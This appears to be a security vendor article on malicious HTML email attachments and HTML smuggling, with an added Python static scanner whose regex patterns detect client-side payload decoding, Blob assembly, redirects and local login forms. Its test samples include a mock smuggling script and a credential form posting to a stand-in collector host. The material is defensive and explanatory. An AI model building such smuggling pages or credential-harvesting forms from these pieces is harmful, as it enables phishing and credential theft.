Can Your Email Security Software Detect These Hidden Threats?

Cybercriminals are increasingly using malicious HTML attachments to bypass security software, but solutions leveraging machine-learning and static code analysis aren’t being fooled.

Email attachments are a popular way to deliver viruses, ransomware, and other cyberattacks. Barracuda researchers have analyzed data on millions of attachments scanned by their security tools and found that HTML attachments are the most likely to be malicious. Twenty-one percent of all HTML attachments reviewed as part of the research were malicious.

HTML attachments are effective because they are used so often in legitimate communication that it is hard to tell the real ones from the malicious ones. Attackers often disguise these attachments as weekly reports or notifications, tricking end users into clicking on phishing links. Because the email body itself contains no suspicious links, the message can slip past anti-spam and antivirus filters.

Since the threat from malicious HTML attachments shows no signs of abating, it’s vital that MSPs, VARs and their clients fully understand the nature of this threat and what steps can help protect their employees from falling victim to these scams.

How HTML Attacks Work

For HTML attachments that include a link to a phishing site, the HTML file uses JavaScript to redirect the victim to a third-party machine and then asks for credentials or initiates a malware download. An HTML attachment can also carry a login form directly: because the file is opened locally on the machine, no link is ever clicked, and link-scanning tools are bypassed. Once login credentials are entered into this form, they can be passed directly to the attacker.

Because these HTML attachments don’t contain malware themselves, they can be challenging to detect. Email gateways and antivirus software may scan attachments for malicious URLs, scripts or other tell-tale signs of an attack. However, the redirects or JavaScript are usually disguised well enough that the files look like normal attachments.

Using JavaScript in HTML attachments to hide phishing URLs is sometimes called HTML smuggling. Once the malicious script has been smuggled past traditional security systems, the victim’s web browser decodes the script, assembling whatever the payload may be on the host device. In effect, the malware is built on the endpoint, behind the firewall, rather than arriving as a recognizable file.

Security software only sees this activity as regular HTML and JavaScript traffic. While there are other approaches to mitigating these attacks, they can have significant downsides. For example, disabling JavaScript could stop some of these attacks, but it would also prevent legitimate web pages from rendering properly.

Companies need a multi-layered approach to successfully stop these attacks without impeding employee productivity – one that inspects email delivery and monitors endpoints, networks, and post-attack activities.

Stopping HTML Attacks

While HTML-based attacks are hard to spot, using a combination of tools and strategies can help companies improve the odds of stopping them.

First, your email protection system should scan and block malicious HTML attachments. As noted above, this is no easy task since the attachments look normal. However, an email security solution that leverages machine learning and static code analysis can better identify these emails because it can be trained to evaluate the contents of the whole email (not just the attachment). Such systems use machine learning to establish what a regular email looks like and then apply that knowledge to detecting phishing scams.
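To make the static-analysis side of this concrete, here is an added example (not Barracuda's code, and not from the original article) of a small scanner that checks an HTML attachment for the three behaviours described above: a script that decodes and assembles an embedded payload in the browser, a locally rendered login form, and a redirect to a third-party site. The indicator names, thresholds and verdict rules are assumptions chosen for illustration; the sample documents are constructed, with padding text in place of any payload.

```python
import re

# Static indicators of the techniques the article describes. Names and the
# base64-length threshold are assumptions for this example, not vendor logic.
INDICATORS = {
    "base64_decode":  re.compile(r"\batob\s*\("),
    "blob_assembly":  re.compile(r"\bnew\s+Blob\s*\("),
    "object_url":     re.compile(r"\bcreateObjectURL\s*\("),
    "legacy_save":    re.compile(r"\bmsSaveOrOpenBlob\b"),
    "download_link":  re.compile(r"<a\b[^>]*\sdownload\b", re.I),
    "meta_refresh":   re.compile(r"<meta\b[^>]*http-equiv\s*=\s*['\"]?refresh", re.I),
    "js_redirect":    re.compile(r"\blocation(?:\.href|\.replace)?\s*[=(]"),
    "password_field": re.compile(r"<input\b[^>]*type\s*=\s*['\"]?password", re.I),
    "large_blob":     re.compile(r"[A-Za-z0-9+/]{120,}={0,2}"),
}

def scan_html(html: str) -> dict:
    """Return the indicators found in one attachment and a coarse verdict."""
    found = [name for name, rx in INDICATORS.items() if rx.search(html)]
    decodes = "base64_decode" in found or "large_blob" in found
    assembles = any(n in found for n in
                    ("blob_assembly", "object_url", "legacy_save", "download_link"))
    redirects = "meta_refresh" in found or "js_redirect" in found
    if decodes and assembles:
        verdict = "smuggling"        # payload built client-side from embedded data
    elif "password_field" in found:
        verdict = "credential_form"  # local login form; no link for URL scanners
    elif redirects:
        verdict = "redirect"         # bounces the victim to a third-party host
    else:
        verdict = "clean"
    return {"verdict": verdict, "indicators": found}

# Constructed samples, not real attachments. The "payload" is repeated padding.
BENIGN = "<html><body><h1>Weekly report</h1><p>See attached PDF.</p></body></html>"
SMUGGLE = ("<html><body><script>var d='" + "QUJD" * 40 + "';"
           "var b=new Blob([atob(d)]);var u=URL.createObjectURL(b);</script>"
           "<a id='dl' download='report.zip'>Download</a></body></html>")
CREDS = ("<html><body><form method='post' action='https://collector.example/login'>"
         "<input name='user'><input type='password' name='pw'></form></body></html>")

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN), ("smuggle", SMUGGLE), ("creds", CREDS)):
        print(label, scan_html(doc))
```

A gateway would run this kind of check on the decoded attachment body alongside its ML model; the heuristics deliberately key on the decode-and-assemble pattern rather than on any particular URL, which is what makes them hard for a smuggled payload to evade.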

For attacks that do get through, deploy an automated incident response solution that can quickly remove all instances of the email from inboxes across the organization. A solution that includes account takeover protection can also help spot misuse of credentials that may have been compromised. Finally, post-delivery remediation tools are critical to a multi-layered security approach.

Educate employees to help them spot malicious HTML attacks and make it easy to report potential incidents. For example, offer regular training, use phishing simulation campaigns to identify employees who need extra help, and provide updates about new threats or recent attacks so employees remain vigilant. In addition, everyone should be cautious of HTML attachments, and policies should be in place to encourage extra care when sharing login credentials.

Cyberattacks continue to grow in number and complexity. However, a holistic approach to email security that relies on machine learning, end user education, and other tools can keep data and networks safe from HTML-based attacks.